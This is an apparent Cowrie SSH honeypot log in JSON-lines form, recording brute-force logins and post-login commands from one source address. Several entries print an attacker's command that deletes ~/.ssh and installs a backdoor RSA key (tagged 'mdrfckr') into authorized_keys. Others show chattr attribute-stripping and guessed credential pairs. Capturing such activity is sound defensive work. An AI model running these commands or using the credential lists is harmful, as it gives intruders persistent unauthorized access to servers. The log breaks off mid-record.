{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:05:27.597132Z","src_ip":"212.227.235.229","session":"694a50bb5222"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:05:27.775400Z","src_ip":"212.227.235.229","session":"694a50bb5222"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:05:27.776415Z","src_ip":"212.227.235.229","session":"694a50bb5222"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56686,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b26f831239c","protocol":"ssh","message":"New connection: 212.227.235.229:56686 (1.2.3.4:22) [session: 6b26f831239c]","sensor":"my-vps","timestamp":"2025-09-08T22:05:27.943984Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:05:27.945294Z","src_ip":"212.227.235.229","session":"6b26f831239c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:05:28.114898Z","src_ip":"212.227.235.229","session":"6b26f831239c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:05:28.795494Z","src_ip":"212.227.235.229","session":"6b26f831239c"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:05:29.967797Z","src_ip":"212.227.235.229","session":"6b26f831239c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56700,"dst_ip":"1.2.3.4","dst_port":22,"session":"4001e36241c0","protocol":"ssh","message":"New connection: 212.227.235.229:56700 (1.2.3.4:22) [session: 4001e36241c0]","sensor":"my-vps","timestamp":"2025-09-08T22:05:30.141193Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:05:30.141833Z","src_ip":"212.227.235.229","session":"4001e36241c0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:05:30.315936Z","src_ip":"212.227.235.229","session":"4001e36241c0"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:05:31.054651Z","src_ip":"212.227.235.229","session":"4001e36241c0"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:05:31.230135Z","src_ip":"212.227.235.229","session":"4001e36241c0"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:05:31.230981Z","src_ip":"212.227.235.229","session":"694a50bb5222"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43548,"dst_ip":"1.2.3.4","dst_port":22,"session":"55908c082f92","protocol":"ssh","message":"New connection: 212.227.235.229:43548 (1.2.3.4:22) [session: 55908c082f92]","sensor":"my-vps","timestamp":"2025-09-08T22:05:46.682296Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:05:46.683631Z","src_ip":"212.227.235.229","session":"55908c082f92"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:05:46.975009Z","src_ip":"212.227.235.229","session":"55908c082f92"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35042,"dst_ip":"1.2.3.4","dst_port":22,"session":"328147c16af3","protocol":"ssh","message":"New connection: 212.227.235.229:35042 (1.2.3.4:22) [session: 328147c16af3]","sensor":"my-vps","timestamp":"2025-09-08T22:05:47.496488Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:05:47.527982Z","src_ip":"212.227.235.229","session":"328147c16af3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:05:47.733004Z","src_ip":"212.227.235.229","session":"328147c16af3"}
{"eventid":"cowrie.login.failed","username":"sgp","password":"sgp@123","message":"login attempt [sgp/sgp@123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:05:48.184729Z","src_ip":"212.227.235.229","session":"55908c082f92"}
{"eventid":"cowrie.login.success","username":"root","password":"root123456*","message":"login attempt [root/root123456*] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:05:48.677718Z","src_ip":"212.227.235.229","session":"328147c16af3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:05:49.158915Z","src_ip":"212.227.235.229","session":"328147c16af3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:05:49.159699Z","src_ip":"212.227.235.229","session":"328147c16af3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:05:49.160861Z","src_ip":"212.227.235.229","session":"328147c16af3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:05:49.366889Z","src_ip":"212.227.235.229","session":"328147c16af3"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:05:49.478844Z","src_ip":"212.227.235.229","session":"55908c082f92"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:05:49.835423Z","src_ip":"212.227.235.229","session":"328147c16af3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:05:49.836198Z","src_ip":"212.227.235.229","session":"328147c16af3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:05:50.040449Z","src_ip":"212.227.235.229","session":"328147c16af3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:05:50.041466Z","src_ip":"212.227.235.229","session":"328147c16af3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35050,"dst_ip":"1.2.3.4","dst_port":22,"session":"3dd9a5d236bc","protocol":"ssh","message":"New connection: 212.227.235.229:35050 (1.2.3.4:22) [session: 3dd9a5d236bc]","sensor":"my-vps","timestamp":"2025-09-08T22:05:50.242013Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:05:50.242739Z","src_ip":"212.227.235.229","session":"3dd9a5d236bc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:05:50.444674Z","src_ip":"212.227.235.229","session":"3dd9a5d236bc"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:05:51.293844Z","src_ip":"212.227.235.229","session":"3dd9a5d236bc"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:05:52.500572Z","src_ip":"212.227.235.229","session":"3dd9a5d236bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35066,"dst_ip":"1.2.3.4","dst_port":22,"session":"758dfc64cd6a","protocol":"ssh","message":"New connection: 212.227.235.229:35066 (1.2.3.4:22) [session: 758dfc64cd6a]","sensor":"my-vps","timestamp":"2025-09-08T22:05:52.707928Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:05:52.708846Z","src_ip":"212.227.235.229","session":"758dfc64cd6a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:05:52.912305Z","src_ip":"212.227.235.229","session":"758dfc64cd6a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:05:53.770511Z","src_ip":"212.227.235.229","session":"758dfc64cd6a"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:05:53.976797Z","src_ip":"212.227.235.229","session":"328147c16af3"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:05:53.978021Z","src_ip":"212.227.235.229","session":"758dfc64cd6a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49512,"dst_ip":"1.2.3.4","dst_port":22,"session":"8abb1b15e260","protocol":"ssh","message":"New connection: 212.227.235.229:49512 (1.2.3.4:22) [session: 8abb1b15e260]","sensor":"my-vps","timestamp":"2025-09-08T22:05:57.638514Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:05:57.639697Z","src_ip":"212.227.235.229","session":"8abb1b15e260"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:05:57.948892Z","src_ip":"212.227.235.229","session":"8abb1b15e260"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50786,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6a001334f97","protocol":"ssh","message":"New connection: 212.227.235.229:50786 (1.2.3.4:22) [session: c6a001334f97]","sensor":"my-vps","timestamp":"2025-09-08T22:05:58.541880Z"}
{"eventid":"cowrie.login.failed","username":"steam","password":"1234","message":"login attempt [steam/1234] failed","sensor":"my-vps","timestamp":"2025-09-08T22:05:59.224741Z","src_ip":"212.227.235.229","session":"8abb1b15e260"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59230,"dst_ip":"1.2.3.4","dst_port":22,"session":"45c423523c99","protocol":"ssh","message":"New connection: 212.227.235.229:59230 (1.2.3.4:22) [session: 45c423523c99]","sensor":"my-vps","timestamp":"2025-09-08T22:06:00.376983Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:06:00.377897Z","src_ip":"212.227.235.229","session":"45c423523c99"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:06:00.535993Z","src_ip":"212.227.235.229","session":"8abb1b15e260"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","a